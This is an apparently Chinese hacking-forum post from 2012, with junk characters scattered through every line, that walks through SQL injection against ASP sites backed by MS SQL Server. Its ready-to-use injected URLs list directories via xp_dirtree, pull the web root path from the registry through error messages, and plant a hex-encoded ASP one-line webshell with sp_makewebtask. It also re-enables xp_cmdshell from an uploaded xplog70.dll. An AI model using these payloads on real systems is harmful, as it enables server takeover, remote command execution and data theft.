好,我们exec master..xp_dirtree'd:/test'
3 J1 k( `9 ^! S) U/ o" i& W8 F! G假设我们在test里有两个文件夹test1和test2在test1里又有test37 o9 j+ n# p' ]) X# P3 T
结果显示" z( p" `: w7 S+ F
* l; v. C* @" l F# ?
subdirectory depth
9 h) O5 e! E, E0 C# r2 v ftest1 1
' I" e* Y4 B) [; y/ B: ]test3 2 d5 ~1 R) z8 {9 l& g' ^
test2 1
3 H/ B6 F3 F! U% c9 M* Y3 [' `# ]* F2 x8 Q, R1 H9 s
哈哈发现没有那个depth就是目录的级数
" x3 H. x* \8 Tok了,知道怎么办了吧% o; N0 g r5 `* n( u
$ n( S1 j5 V# ?7 U0 k
http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)--
; ?3 ?3 \. e" M8 I" d; Thttp://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' -- ; [3 E$ r" b n. j1 T
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-
) c% K) R. i/ I7 k. @0 l) C. C( v/ y4 B8 B- Y. ?7 m, s4 o/ J
只要加上id=1,就是第一级目录 。# c( v2 _7 I% o& [
- L) P5 @& o: v3 u# p
6 q! d; R7 I5 A: j# U* w$ }通过注册表读网站路径:! t. M- [! A. U! [" L3 B8 o; {
G+ b; f% P8 U1.;create table [dbo].[cyfd] ([gyfd][char](255));
+ E6 Q# K# h* C5 Q. x) F% O5 H/ T/ f; a( [' R: G( F* b
2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--
' Z2 J* x* N# D' c7 nid=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--
?' Q2 J( ?( {1 a0 `) s& W8 q
5 M/ Y* F6 i* y3 K- o4 N: w6 J3 M3.and 1=(select count(*) from 临时表 where 临时字段名>1)
# H$ E# D7 R" [& Tand 1=(select count(*) from cyfd where gyfd > 1)
2 V# Q3 I) k) N2 W这样IE报错,就把刚才插进去的Web路径的值报出来了
$ V: j" \& X1 u3 @* B' O* Q) z/ y- ?8 H
4.drop table cyfd;-- 删除临时表
3 k4 K, [! a+ K' a9 W' h7 S5 c3 }# a4 @" C2 F5 x7 b+ c; B
获得webshell方法:
- ^1 V% Y" L( S5 A6 e1.create table cmd (a image)-- \**cmd是创建的临时表
8 f, w; O Q1 J. Z9 ~, }; C- y6 @" ?) g4 a. }9 M
2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话
1 w3 [" D, m! n- X
$ x/ x I+ }' T, j) l$ ], S
8 s( P: N) r# `3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'
& ~9 D, B. @$ F8 y. I& s+ pEXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
% k* Y5 o' {: V: g T6 L% T& i; D
) q- {! r! B: _4 {! L6 i4.drop table cmd;-- 删除cmd临时表, l% D' B( |: X& Y" r5 m
- T2 Y( O, w7 d7 q' _4 \8 l" p恢复xp_cmdshell方法之一:' m! I" @. O6 N
我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交: z9 q) B% D' a9 |3 }* B5 R
http://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll') m, Z. I) n' s E' A
恢复,支持绝对路径的恢复哦。:)
; R' `/ \9 W" R2 ?! n |
发表于 2012-9-13 17:20:30
收藏
支持
反对